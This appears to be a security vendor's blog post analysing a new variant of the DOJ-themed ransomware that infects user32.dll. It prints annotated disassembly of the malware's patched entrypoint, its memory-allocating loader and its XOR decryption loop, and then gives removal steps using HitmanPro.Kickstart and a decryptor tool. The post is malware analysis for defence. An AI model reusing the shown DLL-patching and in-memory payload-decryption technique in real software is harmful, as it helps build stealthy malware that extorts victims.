This post is a follow up on our previous post regarding ransomware infecting user32.dll.
A new variant of the Department of Justice (DOJ) ransomware that embeds itself inside user32.dll is spreading.
This new variant has updated its tactics to avoid detection by antivirus programs. The following section shows an analysis of this new version and indicate the changes have been made.
Just as the previous version, the ransomware patches the code in the entrypoint of user32.dll. But this time the malware authors tried to keep the entrypoint as original as possible. Most noticeably they replace the original CALL with a CALL to AlignRect. See the disassembled code below:
UserClientDllInitialize: 7e41b217 mov edi, edi 7e41b219 push ebp 7e41b21a mov ebp, esp 7e41b21c cmp [ebp+0xC], 1 7e41b220 jnz 0x7e41b227 7e41b222 call 0x7e41b984 7e41b227 pop ebp 7e41b228 nop 7e41b229 nop 7e41b22a nop 7e41b22b nop 7e41b22c nop 7e41b22d mov edi, edi 7e41b22f push ebp
UserClientDllInitialize: 7e41b217 push ebp 7e41b218 mov ebp, esp 7e41b21a cmp [ebp+0xC], 1 7e41b21e jne 0x7e41b225 7e41b220 call USER32!AlignRects (7e46d4e0) 7e41b225 add [eax], al 7e41b227 pop ebp 7e41b228 pop 7e41b229 nop 7e41b22a nop 7e41b22b nop 7e41b22c nop 7e41b22d mov edi, edi 7e41b22f push ebp
Furthermore, the code at AlignRects is modified so that it allocates a new block of executable memory after which it copies the encrypted payload from the resource section to this newly allocated memory. It uses the same technique as the previous version to obtain the address of NtAllocateVirtualMemory() to allocate a writeable/executable region of memory. This memory is used to copy the encrypted payload to, which also contains a small piece of code to decrypt the encrypted payload.
AlignRects: 7e46d4e0 pushad 7e46d4e1 mov eax,dword ptr [ebp+8] ; EAX becomes base-address ; of user32.dll (7E410000) 7e46d4e4 mov ecx,eax 7e46d4e6 add eax,13BCh 7e46d4eb mov eax,dword ptr [eax] ; EAX becomes address of ; NtQueryVirtualMemory 7e46d4ed add eax,0FFFFF5F0h ; EAX becomes address of ; NtAllocateVirtualMemory 7e46d4f2 sub esp,8 7e46d4f5 push 40h ; PAGE_EXECUTE_READWRITE 7e46d4f7 push 3000h 7e46d4fc lea ecx,[ebp-4] 7e46d4ff mov [ecx],0E800h 7e46d505 push ecx 7e46d506 push 0 7e46d508 lea ecx,[ebp-8] 7e46d50b mov [ecx],0 7e46d511 push ecx 7e46d512 push 0FFFFFFFFh 7e46d514 call eax ; call NtAllocateVirtualMemory 7e46d516 mov edi,[ebp-8] ; EDI = allocated address ; (00290000) 7e46d519 mov eax,edi 7e46d51b mov esi,[ebp+8] ; ESI = base-address of user32.dll ; (7E410000) 7e46d51e add esi,8D200h ; ESI = address of encrypted ; payload in resource section 7e46d524 mov ecx,98AEh ; Number of bytes to copy 7e46d529 rep movs es:[edi],ds:[esi] ; Copy to allocated (executable) ; memory range 7e46d52b add esp,8 7e46d52e add eax,981Eh ; EAX = address of decryption code ; (0029981E) 7e46d533 jmp eax ; Start decryption !!
The decryption loop is comparable to the previous version, only some constant values are modified, like for instance the decryption key.
Decryption loop: 0029981e call 00299823 00299823 pop edx ; EDX = current location 00299824 sub edx,7FFA2F3Dh 0029982a push esi 0029982b lea esi,[edx+7FFA2F38h] ; ESI = 0029981E – start of ; decryption code 00299831 mov ecx,981Eh ; Encrypted payload length 00299836 sub esi,ecx ; ESI = allocated mem-base (290000) 00299838 push esi 00299839 mov ebx,1218F90h ; The XOR key (BL only, so 90h) 0029983e xor byte ptr [esi],bl ; Decrypt a byte of the encrypted ; payload 00299840 inc esi 00299841 inc ebx ; Modify XOR key for each byte (+1) 00299842 loop 0029983e 00299844 pop eax 00299845 pop ecx 00299846 mov [eax+12h],ecx 00299849 jmp eax ; Jump to allocated mem-base, which ; is now decrypted.
Removing the ransomware from your system
Victims can use HitmanPro.Kickstart to get rid of the police themed ransomware infection (including this new variant). If HitmanPro detects the ransomware it will query our cloud service to obtain a clean system file, which will be used to replace the infected one on your system.
If for some reason the specific version of your infected user32.dll cannot be obtained from the cloud service, you can manually copy a clean version of user32.dll onto the HitmanPro.Kickstart flash drive. If the version of the infected file on your disk matches that of the clean version on the flash drive, HitmanPro will use that version to replace the infected one on your Windows installation.
You can download HitmanPro with Kickstart from here:
Manual replacement of user32.dll
In the occasion that you are not able to obtain a clean version of user32.dll for your system, you can try the following manual procedure.
The ransomware makes an encrypted copy of the original user32.dll file and stores it in:
You can decrypt this file using our User32DLL decryptor tool, which can be downloaded from: http://dl.surfright.nl/User32Decryptor.exe
See the following screenshot for an example:
You need to retrieve the encrypted user32.ini by e.g. using a Hiren’s boot-cd or some other bootable medium that is able to access your Windows system disk. Once you have decrypted the file, you can simply copy it to the HitmanPro.Kickstart flash drive. Note that the file must be named user32.dll. Once the decrypted file has been placed on the flash drive, you can boot your system with the HitmanPro.Kickstart flashdrive and HitmanPro will use the manually decrypted user32.dll to replace the infected one on your system.
Note: When performing this action, make a copy of the infected user32.dll. In case something goes wrong with the procedure, you can always restore the infected file so your system will at least be able to boot correctly.